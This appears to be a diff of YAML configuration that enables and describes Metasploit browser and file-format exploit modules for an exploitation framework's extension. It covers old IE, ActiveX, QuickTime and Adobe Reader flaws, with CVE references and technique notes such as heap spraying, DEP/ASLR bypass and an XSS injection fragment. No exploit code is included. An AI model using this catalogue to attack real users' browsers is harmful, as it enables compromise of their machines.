Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in Internet Explorer's\n\ + \t\t\t\thandling of the OBJECT type attribute.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0344 + - - OSVDB + - "2967" + - - BID + - "7806" + - - MSB + - MS03-020 + path: extensions/metasploit/ + class: Msf_module +msf_ms10_042_helpctr_xss_cmd_exec: + enable: true + msf: true + msf_key: windows/browser/ms10_042_helpctr_xss_cmd_exec + name: Microsoft Help Center XSS and Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tHelp and Support Center is the default application provided to access online\n\ + \t\t\t\tdocumentation for Microsoft Windows. Microsoft supports accessing help documents\n\ + \t\t\t\tdirectly via URLs by installing a protocol handler for the scheme \"hcp\". Due to\n\ + \t\t\t\tan error in validation of input to hcp:// combined with a local cross site\n\ + \t\t\t\tscripting vulnerability and a specialized mechanism to launch the XSS trigger,\n\ + \t\t\t\tarbitrary command execution can be achieved.\n\n\ + \t\t\t\tOn IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it\n\ + \t\t\t\tcan be used to launch the exploit automatically. If IE8 and WMP11, either can\n\ + \t\t\t\tbe used to launch the attack, but both pop dialog boxes asking the user if\n\ + \t\t\t\texecution should continue. This exploit detects if non-intrusive mechanisms are\n\ + \t\t\t\tavailable and will use one if possible. In the case of both IE8 and WMP11, the\n\ + \t\t\t\texploit defaults to using an iframe on IE8, but is configurable by setting the\n\ + \t\t\t\tDIALOGMECH option to \"none\" or \"player\".\n\ + \t\t\t" + authors: + - - CVE + - 2010-1885 + - - OSVDB + - "65264" + - - URL + - http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY + - - URL + - http://www.microsoft.com/technet/security/advisory/2219475.mspx + - - MSB + - MS10-042 + path: extensions/metasploit/ + class: Msf_module +msf_ultraoffice_httpupload: + enable: true + msf: true + msf_key: windows/browser/ultraoffice_httpupload + name: Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in Ultra Shareware's Office\n\ + \t\t\t\tControl. When processing the 'HttpUpload' method, the arguments are concatenated\n\ + \t\t\t\ttogether to form a command line to run a bundled version of cURL. If the command\n\ + \t\t\t\tfails to run, a stack-based buffer overflow occurs when building the error\n\ + \t\t\t\tmessage. This is due to the use of sprintf() without proper bounds checking.\n\n\ + \t\t\t\tNOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n\ + \t\t\t\tinto memory unmodified.\n\ + \t\t\t" + authors: + - - CVE + - 2008-3878 + - - OSVDB + - "47866" + - - BID + - "30861" + - - URL + - http://www.exploit-db.com/exploits/6318 + path: extensions/metasploit/ + class: Msf_module +msf_awingsoft_winds3d_sceneurl: + enable: true + msf: true + msf_key: windows/browser/awingsoft_winds3d_sceneurl + name: AwingSoft Winds3D Player 3.5 SceneURL Download and Execute + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an untrusted program execution vulnerability within the\n\ + \t\t\t\tWinds3D Player from AwingSoft. The Winds3D Player is a browser plugin for\n\ + \t\t\t\tIE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL'\n\ + \t\t\t\tparameter to the URL to an executable, an attacker can execute arbitrary\n\ + \t\t\t\tcode.\n\n\ + \t\t\t\tTesting was conducted using plugin version 3.5.0.9 for Firefox 3.5 and\n\ + \t\t\t\tIE 8 on Windows XP SP3.\n\ + \t\t\t" + authors: + - - CVE + - 2009-4850 + - - OSVDB + - "60049" + path: extensions/metasploit/ + class: Msf_module +msf_hyleos_chemviewx_activex: + enable: true + msf: true + msf_key: windows/browser/hyleos_chemviewx_activex + name: Hyleos ChemView ActiveX Control Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos\n\ + \t\t\t\tChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods\n\ + \t\t\t\twith an overly long first argument, an attacker can overrun a buffer and execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0679 + - - OSVDB + - "62276" + - - URL + - http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf + - - URL + - http://www.exploit-db.com/exploits/11422/ + path: extensions/metasploit/ + class: Msf_module +msf_wmi_admintools: + enable: true + msf: true + msf_key: windows/browser/wmi_admintools + name: Microsoft WMI Administration Tools ActiveX Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a memory trust issue in the Microsoft WMI\n\ + \t\t\t\tAdministration tools ActiveX control. When processing a specially crafted\n\ + \t\t\t\tHTML page, the WEBSingleView.ocx ActiveX Control (1.50.1131.0) will treat\n\ + \t\t\t\tthe 'lCtxHandle' parameter to the 'AddContextRef' and 'ReleaseContext' methods\n\ + \t\t\t\tas a trusted pointer. It makes an indirect call via this pointer which leads\n\ + \t\t\t\tto arbitrary code execution.\n\n\ + \t\t\t\tThis exploit utilizes a combination of heap spraying and the\n\ + \t\t\t\t.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n\ + \t\t\t\topt-in to ASLR. As such, this module should be reliable on all Windows\n\ + \t\t\t\tversions.\n\n\ + \t\t\t\tThe WMI Adminsitrative Tools are a standalone download & install (linked in the\n\ + \t\t\t\treferences).\n\n\ + \t\t\t" + authors: + - - OSVDB + - "69942" + - - CVE + - 2010-3973 + - - BID + - "45546" + - - URL + - http://wooyun.org/bug.php?action=view&id=1006 + - - URL + - http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf + - - URL + - http://secunia.com/advisories/42693 + - - URL + - http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314 + path: extensions/metasploit/ + class: Msf_module +msf_realplayer_console: + enable: true + msf: true + msf_key: windows/browser/realplayer_console + name: RealPlayer rmoc3260.dll ActiveX Control Heap Corruption + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a heap corruption vulnerability in the RealPlayer ActiveX control.\n\ + \t\t\t\tBy sending a specially crafted string to the 'Console' property\n\ + \t\t\t\tin the rmoc3260.dll control, an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-1309 + - - OSVDB + - "42946" + - - BID + - "28157" + - - URL + - http://secunia.com/advisories/29315/ + path: extensions/metasploit/ + class: Msf_module +msf_mozilla_nstreerange: + enable: true + msf: true + msf_key: windows/browser/mozilla_nstreerange + name: Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a code execution vulnerability in Mozilla Firefox\n\ + \t\t\t\t3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.\n\ + \t\t\t\tBy overwriting a subfunction of invalidateSelection it is possible to free the \n\ + \t\t\t\tnsTreeRange object that the function currently operates on. \n\ + \t\t\t\tAny further operations on the freed object can result in remote code execution.\n\ + \t\t\t\tUtilizing the call setup the function provides it's possible to bypass DEP\n\ + \t\t\t\twithout the need for a ROP. Sadly this exploit is still either dependent\n\ + \t\t\t\ton Java or bound by ASLR because Firefox doesn't employ any ASLR-free\n\ + \t\t\t\tmodules anymore.\n\ + \t\t\t" + authors: + - - CVE + - 2011-0073 + - - OSVDB + - "72087" + - - BID + - "47663" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-11-157/ + - - URL + - https://bugzilla.mozilla.org/show_bug.cgi?id=630919 + - - URL + - http://www.mozilla.org/security/announce/2011/mfsa2011-13.html + path: extensions/metasploit/ + class: Msf_module +msf_ms09_072_style_object: + enable: true + msf: true + msf_key: windows/browser/ms09_072_style_object + name: Internet Explorer Style getElementsByTagName Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a vulnerability in the getElementsByTagName function\n\ + \t\t\tas implemented within Internet Explorer.\n\ + \t\t\t" + authors: + - - MSB + - MS09-072 + - - CVE + - 2009-3672 + - - OSVDB + - "50622" + - - BID + - "37085" + - - URL + - http://www.microsoft.com/technet/security/advisory/977981.mspx + - - URL + - http://taossa.com/archive/bh08sotirovdowd.pdf + path: extensions/metasploit/ + class: Msf_module +msf_ms08_053_mediaencoder: + enable: true + msf: true + msf_key: windows/browser/ms08_053_mediaencoder + name: Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Windows Media Encoder 9. When\n\ + \t\t\t\tsending an overly long string to the GetDetailsString() method of wmex.dll\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-3008 + - - OSVDB + - "47962" + - - BID + - "31065" + - - MSB + - MS08-053 + path: extensions/metasploit/ + class: Msf_module +msf_greendam_url: + enable: true + msf: true + msf_key: windows/browser/greendam_url + name: Green Dam URL Processing Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in Green Dam Youth Escort\n\ + \t\t\t\tversion 3.17 in the way it handles overly long URLs.\n\ + \t\t\t\tBy setting an overly long URL, an attacker can overrun a buffer and execute\n\ + \t\t\t\tarbitrary code. This module uses the .NET DLL memory technique by Alexander\n\ + \t\t\t\tSotirov and Mark Dowd and should bypass DEP, NX and ASLR.\n\ + \t\t\t" + authors: + - - OSVDB + - "55126" + - - URL + - http://www.cse.umich.edu/~jhalderm/pub/gd/ + - - URL + - http://www.milw0rm.com/exploits/8938 + - - URL + - http://taossa.com/archive/bh08sotirovdowd.pdf + path: extensions/metasploit/ + class: Msf_module +msf_ie_unsafe_scripting: + enable: true + msf: true + msf_key: windows/browser/ie_unsafe_scripting + name: Internet Explorer Unsafe Scripting Misconfiguration + category: Metasploit + description: "\n\ + \t\t\t\tThis exploit takes advantage of the \"Initialize and script ActiveX controls not\n\ + \t\t\tmarked safe for scripting\" setting within Internet Explorer. When this option is set,\n\ + \t\t\tIE allows access to the WScript.Shell ActiveX control, which allows javascript to\n\ + \t\t\tinteract with the file system and run commands. This security flaw is not uncommon\n\ + \t\t\tin corporate environments for the 'Intranet' or 'Trusted Site' zones. In order to\n\ + \t\t\tsave binary data to the file system, ADODB.Stream access is required, which in IE7\n\ + \t\t\twill trigger a cross domain access violation. As such, we write the code to a .vbs\n\ + \t\t\tfile and execute it from there, where no such restrictions exist.\n\n\ + \t\t\t\tWhen set via domain policy, the most common registry entry to modify is HKLM\\\n\ + \t\t\tSoftware\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\1201,\n\ + \t\t\twhich if set to '0' forces ActiveX controls not marked safe for scripting to be\n\ + \t\t\tenabled for the Intranet zone.\n\n\ + \t\t\t\tThis module creates a javascript/html hybrid that will render correctly either\n\ + \t\t\tvia a direct GET http://msf-server/ or as a javascript include, such as in:\n\ + \t\t\thttp://intranet-server/xss.asp?id=\">\n\ + \t\t\t.\n\ + \t\t\t" + authors: + - - URL + - http://support.microsoft.com/kb/182569 + - - URL + - http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html + path: extensions/metasploit/ + class: Msf_module +msf_ms09_043_owc_msdso: + enable: true + msf: true + msf_key: windows/browser/ms09_043_owc_msdso + name: Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a memory corruption vulnerability within versions 10 and 11 of\n\ + \t\t\t\tthe Office Web Component Spreadsheet ActiveX control. This module was based on\n\ + \t\t\t\tan exploit found in the wild.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1136 + - - OSVDB + - "55806" + - - MSB + - MS09-043 + - - URL + - http://ahmed.obied.net/software/code/exploits/ie_owc.py + - - URL + - http://www.exploit-db.com/exploits/9163/ + - - URL + - http://www.microsoft.com/technet/security/advisory/973472.mspx + path: extensions/metasploit/ + class: Msf_module +msf_ms11_003_ie_css_import: + enable: true + msf: true + msf_key: windows/browser/ms11_003_ie_css_import + name: Internet Explorer CSS Recursive Import Use After Free + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a memory corruption vulnerability within Microsoft\\'s\n\ + \t\t\t\tHTML engine (mshtml). When parsing an HTML page containing a recursive CSS\n\ + \t\t\t\timport, a C++ object is deleted and later reused. This leads to arbitrary\n\ + \t\t\t\tcode execution.\n\n\ + \t\t\t\tThis exploit utilizes a combination of heap spraying and the\n\ + \t\t\t\t.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n\ + \t\t\t\topt-in to ASLR. As such, this module should be reliable on all Windows\n\ + \t\t\t\tversions with .NET 2.0.50727 installed.\n\ + \t\t\t" + authors: + - - CVE + - 2010-3971 + - - OSVDB + - "69796" + - - BID + - "45246" + - - URL + - http://www.microsoft.com/technet/security/advisory/2488013.mspx + - - URL + - http://www.wooyun.org/bugs/wooyun-2010-0885 + - - URL + - http://seclists.org/fulldisclosure/2010/Dec/110 + - - URL + - http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf + - - URL + - http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ + - - MSB + - MS11-003 + path: extensions/metasploit/ + class: Msf_module +msf_creative_software_cachefolder: + enable: true + msf: true + msf_key: windows/browser/creative_software_cachefolder + name: Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When\n\ + \t\t\t\tsending an overly long string to the cachefolder() property of CTSUEng.ocx\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-0955 + - - OSVDB + - "45655" + path: extensions/metasploit/ + class: Msf_module +msf_webex_ucf_newobject: + enable: true + msf: true + msf_key: windows/browser/webex_ucf_newobject + name: WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in WebEx's WebexUCFObject\n\ + \t\t\t\tActiveX Control. If an long string is passed to the 'NewObject' method, a stack-\n\ + \t\t\t\tbased buffer overflow will occur when copying attacker-supplied data using the\n\ + \t\t\t\tsprintf function.\n\n\ + \t\t\t\tIt is noteworthy that this vulnerability was discovered and reported by multiple\n\ + \t\t\t\tindependent researchers. To quote iDefense's advisory, \"Before this issue was\n\ + \t\t\t\tpublicly reported, at least three independent security researchers had knowledge\n\ + \t\t\t\tof this issue; thus, it is reasonable to believe that even more people were aware\n\ + \t\t\t\tof this issue before disclosure.\"\n\n\ + \t\t\t\tNOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n\ + \t\t\t\tinto memory unmodified.\n\ + \t\t\t" + authors: + - - CVE + - 2008-3558 + - - OSVDB + - "47344" + - - BID + - "30578" + - - URL + - http://www.exploit-db.com/exploits/6220 + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849 + - - URL + - http://www.trapkit.de/advisories/TKADV2008-009.txt + - - URL + - http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html + - - URL + - http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html + - - URL + - http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml + path: extensions/metasploit/ + class: Msf_module +msf_winamp_playlist_unc: + enable: true + msf: true + msf_key: windows/browser/winamp_playlist_unc + name: Winamp Playlist UNC Path Computer Name Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the Winamp media player.\n\ + \t\t\t\tThis flaw is triggered when a audio file path is specified, inside a\n\ + \t\t\t\tplaylist, that consists of a UNC path with a long computer name. This\n\ + \t\t\t\tmodule delivers the playlist via the browser. This module has only\n\ + \t\t\t\tbeen successfully tested on Winamp 5.11 and 5.12.\n\ + \t\t\t" + authors: + - - CVE + - 2006-0476 + - - OSVDB + - "22789" + - - BID + - "16410" + path: extensions/metasploit/ + class: Msf_module +msf_real_arcade_installerdlg: + enable: true + msf: true + msf_key: windows/browser/real_arcade_installerdlg + name: Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in Real Networks Acrade Game's ActiveX control. The \"exec\"\n\ + \t\t\t\tfunction found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands\n\ + \t\t\t\ton the victim machine.\n\ + \t\t\t" + authors: + - - OSVDB + - "71559" + - - URL + - http://www.exploit-db.com/exploits/17105/ + path: extensions/metasploit/ + class: Msf_module +msf_apple_quicktime_marshaled_punk: + enable: true + msf: true + msf_key: windows/browser/apple_quicktime_marshaled_punk + name: Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a memory trust issue in Apple QuickTime\n\ + \t\t\t\t7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX\n\ + \t\t\t\tcontrol will treat a supplied parameter as a trusted pointer. It will\n\ + \t\t\t\tthen use it as a COM-type pUnknown and lead to arbitrary code execution.\n\n\ + \t\t\t\tThis exploit utilizes a combination of heap spraying and the\n\ + \t\t\t\tQuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not\n\ + \t\t\t\topt-in to ASLR. As such, this module should be reliable on all Windows\n\ + \t\t\t\tversions.\n\n\ + \t\t\t\tNOTE: The addresses may need to be adjusted for older versions of QuickTime.\n\ + \t\t\t" + authors: + - - CVE + - 2010-1818 + - - OSVDB + - "67705" + - - URL + - http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1 + path: extensions/metasploit/ + class: Msf_module +msf_novelliprint_executerequest: + enable: true + msf: true + msf_key: windows/browser/novelliprint_executerequest + name: Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 4.26. When\n\ + \t\t\t\tsending an overly long string to the ExecuteRequest() property of ienipp.ocx\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-0935 + - - OSVDB + - "42063" + - - BID + - "27939" + path: extensions/metasploit/ + class: Msf_module +msf_ms06_013_createtextrange: + enable: true + msf: true + msf_key: windows/browser/ms06_013_createtextrange + name: Internet Explorer createTextRange() Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a code execution vulnerability in Microsoft Internet Explorer.\n\ + \t\t\t\tBoth IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under\n\ + \t\t\t\tcertain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point\n\ + \t\t\t\tto a very remote, non-existent memory location. This module is the result of merging three\n\ + \t\t\t\tdifferent exploit submissions and has only been reliably tested against Windows XP SP2.\n\ + \t\t\t\tThis vulnerability was independently discovered by multiple parties. The heap spray method\n\ + \t\t\t\tused by this exploit was pioneered by Skylined.\n\ + \t\t\t" + authors: + - - CVE + - 2006-1359 + - - OSVDB + - "24050" + - - MSB + - MS06-013 + - - BID + - "17196" + - - US-CERT-VU + - "876678" + - - URL + - http://secunia.com/secunia_research/2006-7/advisory/ + - - URL + - http://seclists.org/lists/bugtraq/2006/Mar/0410.html + - - URL + - http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html + - - URL + - http://www.shog9.com/crashIE.html + path: extensions/metasploit/ + class: Msf_module +msf_ms06_001_wmf_setabortproc: + enable: true + msf: true + msf_key: windows/browser/ms06_001_wmf_setabortproc + name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the GDI library included with\n\ + \t\t\t\tWindows XP and 2003. This vulnerability uses the 'Escape' metafile function\n\ + \t\t\t\tto execute arbitrary code through the SetAbortProc procedure. This module\n\ + \t\t\t\tgenerates a random WMF record stream for each request.\n\ + \t\t\t" + authors: + - - CVE + - 2005-4560 + - - OSVDB + - "21987" + - - MSB + - MS06-001 + - - BID + - "16074" + - - URL + - http://www.microsoft.com/technet/security/advisory/912840.mspx + - - URL + - http://wvware.sourceforge.net/caolan/ora-wmf.html + - - URL + - http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt + path: extensions/metasploit/ + class: Msf_module +msf_enjoysapgui_preparetoposthtml: + enable: true + msf: true + msf_key: windows/browser/enjoysapgui_preparetoposthtml + name: EnjoySAP SAP GUI ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in SAP KWEdit ActiveX\n\ + \t\t\t\tControl (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending\n\ + \t\t\t\tan overly long string to the \"PrepareToPostHTML()\" method, an attacker\n\ + \t\t\t\tmay be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-3605 + - - OSVDB + - "37690" + - - BID + - "24772" + path: extensions/metasploit/ + class: Msf_module +msf_ms07_017_ani_loadimage_chunksize: + enable: true + msf: true + msf_key: windows/email/ms07_017_ani_loadimage_chunksize + name: Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a buffer overflow vulnerability in the\n\ + \t\t\t\tLoadAniIcon() function of USER32.dll. The flaw is triggered\n\ + \t\t\t\tthrough Outlook Express by using the CURSOR style sheet\n\ + \t\t\t\tdirective to load a malicious .ANI file.\n\n\ + \t\t\t\tThis vulnerability was discovered by Alexander Sotirov of Determina\n\ + \t\t\t\tand was rediscovered, in the wild, by McAfee.\n\ + \t\t\t" + authors: + - - MSB + - MS07-017 + - - CVE + - 2007-0038 + - - CVE + - 2007-1765 + - - OSVDB + - "33629" + - - BID + - "23194" + - - URL + - http://www.microsoft.com/technet/security/advisory/935423.mspx + - - URL + - http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp + - - URL + - http://www.determina.com/security.research/vulnerabilities/ani-header.html + path: extensions/metasploit/ + class: Msf_module +msf_adobe_cooltype_sing: + enable: true + msf: true + msf_key: windows/fileformat/adobe_cooltype_sing + name: Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n\ + \t\t\t\thandling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version are\n\ + \t\t\t\tassumed to be vulnerable as well.\n\ + \t\t\t" + authors: + - - CVE + - 2010-2883 + - - OSVDB + - "67849" + - - URL + - http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html + - - URL + - http://www.adobe.com/support/security/advisories/apsa10-02.html + path: extensions/metasploit/ + class: Msf_module +msf_nis2004_antispam: + enable: true + msf: true + msf_key: windows/browser/nis2004_antispam + name: Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Norton AntiSpam 2004. When\n\ + \t\t\t\tsending an overly long string to the LaunchCustomRuleWizard() method\n\ + \t\t\t\tof symspam.dll (2004.1.0.147) an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0363 + - - OSVDB + - "6249" + - - BID + - "9916" + path: extensions/metasploit/ + class: Msf_module +msf_symantec_altirisdeployment_downloadandinstall: + enable: true + msf: true + msf_key: windows/browser/symantec_altirisdeployment_downloadandinstall + name: Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module allows remote attackers to install and execute arbitrary files on a users file system via\n\ + \t\t\t\tAeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.\n\ + \t\t\t" + authors: + - - BID + - "36346" + - - CVE + - 2009-3028 + - - OSVDB + - "57893" + path: extensions/metasploit/ + class: Msf_module +msf_softartisans_getdrivename: + enable: true + msf: true + msf_key: windows/browser/softartisans_getdrivename + name: SoftArtisans XFile FileManager ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in SoftArtisans XFile FileManager ActiveX control\n\ + \t\t\t\t(SAFmgPwd.dll 2.0.5.3). When sending an overly long string to the GetDriveName() method\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-1682 + - - OSVDB + - "47794" + - - US-CERT-VU + - "914785" + - - BID + - "30826" + path: extensions/metasploit/ + class: Msf_module +msf_apple_quicktime_rtsp: + enable: true + msf: true + msf_key: windows/browser/apple_quicktime_rtsp + name: Apple QuickTime 7.1.3 RTSP URI Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Apple QuickTime\n\ + \t\t\t\t7.1.3. This module was inspired by MOAB-01-01-2007. The\n\ + \t\t\t\tBrowser target for this module was tested against IE 6 and\n\ + \t\t\t\tFirefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the\n\ + \t\t\t\tQuickTime plugin.\n\ + \t\t\t" + authors: + - - CVE + - 2007-0015 + - - OSVDB + - "31023" + - - BID + - "21829" + - - URL + - http://projects.info-pull.com/moab/MOAB-01-01-2007.html + path: extensions/metasploit/ + class: Msf_module +msf_novelliprint_getdriversettings_2: + enable: true + msf: true + msf_key: windows/browser/novelliprint_getdriversettings_2 + name: Novell iPrint Client ActiveX Control <= 5.52 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 5.52. When\n\ + \t\t\t\tsending an overly long string to the GetDriverSettings() property of ienipp.ocx\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2010-4321 + - - BID + - "44966" + - - OSVDB + - "69357" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-256/ + - - URL + - http://www.exploit-db.com/exploits/16014/ + - - URL + - http://www.novell.com/support/viewContent.do?externalId=7007234 + path: extensions/metasploit/ + class: Msf_module +msf_ca_brightstor_addcolumn: + enable: true + msf: true + msf_key: windows/browser/ca_brightstor_addcolumn + name: CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThe CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based\n\ + \t\t\t\tbuffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker\n\ + \t\t\t\tcould overflow a buffer and execute arbitrary code on the system.\n\ + \t\t\t" + authors: + - - CVE + - 2008-1472 + - - OSVDB + - "43214" + path: extensions/metasploit/ + class: Msf_module +msf_symantec_consoleutilities_browseandsavefile: + enable: true + msf: true + msf_key: windows/browser/symantec_consoleutilities_browseandsavefile + name: Symantec ConsoleUtilities ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Symantecs ConsoleUtilities.\n\ + \t\t\t\tBy sending an overly long string to the \"BrowseAndSaveFile()\" method located\n\ + \t\t\t\tin the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to\n\ + \t\t\t\texecute arbitrary code\n\ + \t\t\t" + authors: + - - CVE + - 2009-3031 + - - OSVDB + - "59597" + - - BID + - "36698" + - - URL + - http://sotiriu.de/adv/NSOADV-2009-001.txt + - - URL + - http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00 + path: extensions/metasploit/ + class: Msf_module +msf_yahoomessenger_fvcom: + enable: true + msf: true + msf_key: windows/browser/yahoomessenger_fvcom + name: Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX\n\ + \t\t\t\tControl (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string\n\ + \t\t\t\tto the \"fvCom()\" method from a yahoo.com domain, an attacker may be able\n\ + \t\t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-4515 + - - OSVDB + - "37739" + - - BID + - "25494" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591 + path: extensions/metasploit/ + class: Msf_module +msf_aol_ampx_convertfile: + enable: true + msf: true + msf_key: windows/browser/aol_ampx_convertfile + name: AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in AOL IWinAmpActiveX\n\ + \t\t\t\tclass (AmpX.dll) version 2.4.0.6 installed via AOL Radio website.\n\ + \t\t\t\tBy setting an overly long value to 'ConvertFile()', an attacker can overrun\n\ + \t\t\t\ta buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "54706" + - - BID + - "35028" + - - URL + - http://www.milw0rm.com/exploits/8733 + path: extensions/metasploit/ + class: Msf_module +msf_adobe_utilprintf: + enable: true + msf: true + msf_key: windows/fileformat/adobe_utilprintf + name: Adobe util.printf() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional\n\ + \t\t\t\t< 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()\n\ + \t\t\t\tentry, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-2992 + - - OSVDB + - "49520" + path: extensions/metasploit/ + class: Msf_module 